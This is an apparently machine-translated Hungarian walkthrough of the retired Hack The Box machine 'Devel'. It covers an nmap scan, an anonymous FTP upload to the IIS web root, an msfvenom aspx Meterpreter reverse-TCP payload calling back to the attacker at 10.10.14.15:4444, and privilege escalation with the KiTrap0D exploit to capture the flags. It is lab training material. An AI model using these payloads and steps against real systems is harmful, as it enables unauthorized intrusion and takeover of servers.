Tartsd magad nyugodtan és csapd meg a dobozt - Devel

A Hack The Box (HTB) egy online platform, amely lehetővé teszi, hogy tesztelje penetrációs tesztelési képességeit. Számos, folyamatosan frissülő kihívást tartalmaz. Néhányan a valós világ forgatókönyveit szimulálják, mások pedig inkább a CTF kihívási stílusa felé hajlanak.

Megjegyzés . Csak nyugdíjas HTB gépek írása engedélyezett.

A Devel egy viszonylag egyszerű doboz, amely bemutatja az alapértelmezett programkonfigurációkhoz kapcsolódó biztonsági kockázatokat. Ez egy kezdő szintű gép, amelyet a nyilvánosan elérhető kiaknázásokkal lehet teljesíteni.

A következő eszközökkel fogjuk zálogba dobni a Kali Linux dobozát

  • nmap
  • zenmap
  • searchsploit
  • metasploit
  • msfvenom

1. lépés - A hálózat szkennelése

A gép kihasználása előtt az első lépés egy kis pásztázás és felderítés.

Ez az egyik legfontosabb rész, mivel ez fogja meghatározni, hogy mit próbálhat ki kihasználni utána. Mindig jobb, ha több időt töltünk arra a szakaszra, hogy minél több információt kapjunk.

Az Nmap-ot (Network Mapper) fogom használni , amely egy ingyenes és nyílt forráskódú segédprogram a hálózati felfedezéshez és a biztonsági auditáláshoz. Nyers IP-csomagok segítségével határozza meg, hogy milyen gazdagépek érhetők el a hálózaton, milyen szolgáltatásokat kínálnak ezek a gazdagépek, milyen operációs rendszereket futtatnak, milyen típusú csomagszűrőket / tűzfalakat használnak, és tucatnyi egyéb jellemzőt.

Számos parancs használható ezzel az eszközzel a hálózat szkenneléséhez. Ha többet szeretne megtudni róla, itt megtekintheti a dokumentációt.

A következő paranccsal kapok alapképet arról, hogy mit vizsgálunk

nmap -sV -O -F --version-light 10.10.10.5

-sV: Nyissa meg a nyitott portokat a szolgáltatás / verzió információinak meghatározásához

-O: Engedélyezze az operációs rendszer észlelését

-F: Gyors mód - Kevesebb portot keres be, mint az alapértelmezett beolvasás

--version-light: Korlátozás a legvalószínűbb próbákra (2. intenzitás)

10.10.10. 5 : A Devel mező IP-címe

Használhatja a Zenmap-ot is , amely a hivatalos Nmap Security Scanner GUI. Ez egy több platformos, ingyenes és nyílt forráskódú alkalmazás, amelynek célja, hogy az Nmap a kezdők számára könnyen használható legyen, miközben fejlett funkciókat kínál a tapasztalt Nmap felhasználók számára.

Egy másik parancskészletet használok az intenzív vizsgálat elvégzéséhez

nmap -A -v 10.10.10.5

-A: Engedélyezze az operációs rendszer észlelését, a verzió észlelését, a szkript szkennelését és a nyomkövetési utat

-v: Növelje a részletességi szintet

10.10.10.5: A Devel doboz IP-címe

Ha az eredményeket kissé túlságosan elsöprőnek találja, akkor a Portok / Gazdagépek fülre lépve csak a nyitott portokat kapja meg.

Láthatjuk, hogy 2 nyitott port van:

21. kikötő . File Transfer Protocol (FTP) vezérlés (parancs). Itt egy Microsoft FTP

80-as kikötő . Hypertext Transfer Protocol (HTTP). Itt ez egy IIS szerver

A legvalószínűbb kezdő támadásvektor ebben az esetben az FTP

2. lépés - A sebezhető FTP

Megnyitjuk a Firefoxot, és felkeressük a weboldalt a //10.10.10.5 címen

A felderítési fázistól kezdve 2 fájlt találtunk a Microsoft FTP alatt. Lássuk, hozzáférhetünk-e hozzájuk a böngészőből.

A welcome.png képfájlhoz a látogatással férhetek hozzá

//10.10.10.5/welcome.png

Hozzáférhetek az iisstart.htm oldalhoz is

//10.10.10.5/iisstart.htm

Most két dolgot tudunk:

  • Az FTP-t a webszerver fájlkönyvtáraként használják - akkor fedezték fel, amikor a fájlokhoz az újrakezdési fázisból beléptünk.
  • Az FTP lehetővé teszi a névtelen bejelentkezést - az intenzív vizsgálat elvégzése során fedezték fel.

Nézzük meg, tudunk-e létrehozni egy fájlt és hozzáadni az FTP-hez

Ezzel a paranccsal létrehozok egy fájlt, és az eredményt egy htb.html nevű fájlba juttatom

echo HackTheBox > htb.html

Ezután ls- vel ellenőrzöm, hogy létrejött-e a fájl, és mi a fájl tartalma ezzel a paranccsal

cat htb.html

Csatlakozzon most az FTP-hez a tesztfájlunk hozzáadásához

Az FTP-hez való csatlakozáshoz ezt a parancsot használom

ftp 10.10.10.5

Anonimát írok be felhasználónévként, és csak az enter billentyűt nyomom meg a jelszóért, mivel ez lehetővé teszi a névtelen bejelentkezést.

Most csatlakozom az FTP-hez.

Ezzel a paranccsal adom hozzá a fájlt az FTP-re

put htb.html

A fájlt sikeresen elküldtük. Ellenőrizzük, hogy elérhetjük-e a Firefoxból. Meglátogatom az oldalt, és láthatjuk a HackTheBox kimenetet a weboldalon.

//10.10.10.5/htb.html

Most, hogy tudjuk, hogy fájlokat küldhetünk, készítsünk egy kihasználást!

3. lépés - Az MSFvenom használata egy kihasználás létrehozásához

Az MSFvenom-ot fogjuk használni, amely hasznos terhelésgenerátor. Itt többet megtudhat róla

De először ellenőrizzük a Metasploit Framework-en, hogy melyik hasznos teherre lesz szükségünk a kihasználáshoz.

Tudjuk, hogy létre kell hoznunk egy fordított héjat , amely egy olyan típusú héj, amelyben a célgép visszakommunikál a támadó géphez. A támadó gép rendelkezik egy figyelő porttal, amelyen megkapja a kapcsolatot, amely használatával, kód vagy parancs végrehajtásával érhető el.

A fordított TCP héj Windows-nak kell lennie, és a Meterpreter-t fogjuk használni .

Az Offensive Security webhelyről megkapjuk a Meterpreter definícióját

A Meterpreter egy fejlett, dinamikusan bővíthető hasznos teher, amely a memóriában lévő DLL injekciós szakaszokat használja, és futás közben kiterjesztésre kerül a hálózaton. Az átmeneti socketen keresztül kommunikál, és átfogó ügyféloldali Ruby API-t biztosít. Jellemzi a parancsok előzményeit, a fülek kiegészítését, a csatornákat és egyebeket.

A Meterpreterről itt olvashat bővebben.

Elindítom Metasploit és keressen fordított TCP rakományt. A következő parancsot használom

search windows/meterpreter/reverse_tcp

Érdekes terhelést találunk, a 2. számot, amely egy Reverse TCP Stager .Ez a hasznos teher a Reflective Dll Injection hasznos terhelésen keresztül injektálja a mérő kiszolgáló DLL-jét, és visszakapcsolódik a támadóhoz

payload/windows/meterpreter/reverse_tcp

Most térjünk vissza az msfvenom oldalra, hogy kidolgozzuk a kihasználásunkat. Pontosabban egy aspx fordított héj. Ezt az információt az újratervezési szakaszban gyűjtöttük össze

A következő parancsot használom

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444

- p : Hasznos teher

- f : Kimeneti formátum

- 0 : Mentsd el a hasznos terhet egy fájlba

LHOST : Helyi gazda

LPORT : Helyi kikötő

Ezután ls- vel ellenőrizem, hogy létrejött-e a fájl. Ideje elküldeni az FTP-nek

Csatlakozzunk újra az FTP-hez, és küldjük el a kis ajándékunkat!

Csatlakozom az FTP-hez, felhasználónévként névtelenül írok be, az enter megnyomásával kihagyom a jelszót. Ezután elküldöm a fájlt a következő paranccsal

put devel.aspx

Ellenőrizzük, hogy a fájlt helyesen küldték-e el. Visszatérve a Firefoxra , a következő paranccsal navigálok az FTP szerverre

ftp://10.10.10.5

Láthatjuk, hogy itt van a mi kis ajándékunk!

Itt van a kihasználás, ha kíváncsi vagy, hogy néz ki

4. lépés - Hallgató beállítása a Metasploit segítségével

Vissza a Metasploit-ra, ahol a következő paranccsal állítom be a hasznos terhelés-kezelőt

use exploit/multi/handler

Megnézem, hogy mely opciók állnak rendelkezésre

Először állítottuk be a hasznos terhet

set payload windows/meterpreter/reverse_tcp

Aztán a LHOST

set lhost 10.10.14.15

És végül az LPORT

set lport 4444

Ha most ellenőrizzük a lehetőségeket, látnunk kell, hogy minden be van állítva

Futtassuk a kihasználást.

Miután ez az üzenet megjelenik

Started reverse TCP handler on 10.10.14.15:4444

térjen vissza a böngészőhöz, és nyissa meg azt az oldalt, ahol a rosszindulatú parancsfájl van tárolva

//10.10.10.5/devel.aspx

Ezután látnia kell egy Meterpreter munkamenet létrehozását

Most, hogy munkamenetem van, megpróbálom megkeresni az első flaget, a user.txt fájlt a következő paranccsal a meterpreter-en

search -f user.txt

Egyetlen fájl sem felel meg a keresésemnek. A. * -Al próbálok más fájlokat megtekinteni, de semmi hasznos

Ezután létrehozok egy héjat a következő paranccsal

shell

A következő paranccsal kapom meg a rendszerinformációkat

systeminfo

Láthatjuk, hogy a bejegyzett tulajdonos neve babis . Ez fontos információ lehet, amikor a felhasználói zászlót keressük. Azt is láthatjuk, hogy a gépnek nincsenek gyorsjavításai.

Elkezdek navigálni a mappák között. A dir segítségével felsorolom az összes fájlt / mappát, a CD-vel pedig a könyvtárat. Szerencsét próbálok a babis és az Administrator mappákon, de mindkettő megadta a hozzáférést.

Ki kell terjesztenünk a kiváltságokat! Annak tudatában, hogy amikor a rendszerinformációkat megvizsgáltuk, nem találhatók gyorsjavítások, megpróbálhatjuk megtalálni a gépre alkalmazható kihasználásokat.

5. lépés - Privilege Escalation végrehajtása

A munkamenetet ezzel a paranccsal a háttérben állítom

background

Ezután a következő parancsot használom

use post/multi/recon/local_exploit_suggester

Ez a modul a használható Meterpreter kihasználásokat javasolja. A kihasználásokat az architektúra és a platform alapján javasoljuk, hogy a felhasználó héjat nyitott, valamint a Meterpreterben elérhető elérhető kihasználások alapján.

Ellenőrizem a lehetőségeket, és beállítom a munkamenetet

Fontos megjegyezni, hogy nem minden helyi kiaknázást lőnek ki. A kihasználtságot a következő feltételek alapján választják meg: a munkamenet típusa, a platform, az architektúra és a szükséges alapértelmezett beállítások

Lefelé haladva a listán

exploit/windows/local/bypassuac_eventvwr

meghiúsul, mivel az IIS-felhasználó nem része a rendszergazdák csoportjának, ami az alapértelmezett és várható.

A lista következő kihasználását használom, ami

use exploit/windows/local/ms10_015_kitrap0d

Ez a modul a Tavis Ormandy KiTrap0D kihasználásával egy új SYSTEM jogosultsággal rendelkező munkamenetet hoz létre. Ha a használatban lévő munkamenet már megemelkedett, akkor a kihasználás nem fog futni. A modul a kitrap0d.x86.dll fájlra támaszkodik, és a Windows x64 kiadásaiban nem támogatott.

Amikor a Meterpreter munkamenetben futtattuk a sysinfót, kiderült, hogy a cél x86 architektúra

Megnézem a lehetőségeket, majd beállítom a munkamenetet

Futtatom a kihasználást.

A kihasználás sikeres volt, de a munkamenetet nem sikerült létrehozni. Ennek oka az, hogy a kihasználás első sora fordított kezelőt próbál beállítani az alapértelmezett eth0 és alapértelmezett porton, és nem a HTB laboratóriumok VPN-felülete.

Started reverse TCP handler on 10.0.2.15:4444

Megnézem a lehetőségeket, és beállítom a LHOST és az LPORT programokat

Ezután ellenőrizzem az összes munkamenetet a következő paranccsal, hátha a munkamenet meghalt

sessions -l

Láthatom az ülésemet

Most, hogy van egy mérőóra munkamenet, kezdjük el navigálni a mappát, és keressük meg a zászlókat!

6. lépés - A user.txt jelző keresése

Először ellenőrizzük, hogy hol tartunk a következő paranccsal

pwd

amely a nyomtatott munka könyvtárat jelenti

Megyek fel a C: \ és ls összes fájl / mappa. Már tudom, hová érdemes keresnem a 4. lépésben - Hallgató beállítása a Metasploit segítségével - tett korábbi kísérletemből

Visszalépek a Felhasználók könyvtárba

Ezután lépjen a babis könyvtárba

Innen megyek az Asztal könyvtárba

Megtaláltuk a user.txt.txt fájlt! A fájl tartalmának elolvasásához a parancsot használom

cat user.txt.txt

Most, hogy megvan a felhasználói zászló, keressük meg a gyökérzászlót!

7. lépés - A root.txt zászló keresése

Visszatérve a C: \ elemre az Adminisztrátor mappába, majd az Asztal mappába navigálva . Az ls segítségével minden fájlt felsorolok az Asztal mappa alatt

Megtaláljuk a root.txt.txt fájlt!

A fájl tartalmának elolvasásához a parancsot használom

cat root.txt.txt

Gratula! Megtalálta mindkét zászlót!

Kérjük, ne habozzon kommentálni, kérdéseket feltenni vagy megosztani barátaival :)

További cikkeim itt láthatók

Kövess engem a Twitteren vagy a LinkedIn-en

És ne felejtsd el # GetSecure , # BeSecure és # StaySecure !

Egyéb Hack The Box cikkek

  • Tartsd magad nyugodtan és csapd meg a dobozt - Béna
  • Tartsd magad nyugodtan és Hack the Box - Legacy
  • Tartsd magad nyugodtan és csapd meg a dobozt - csipog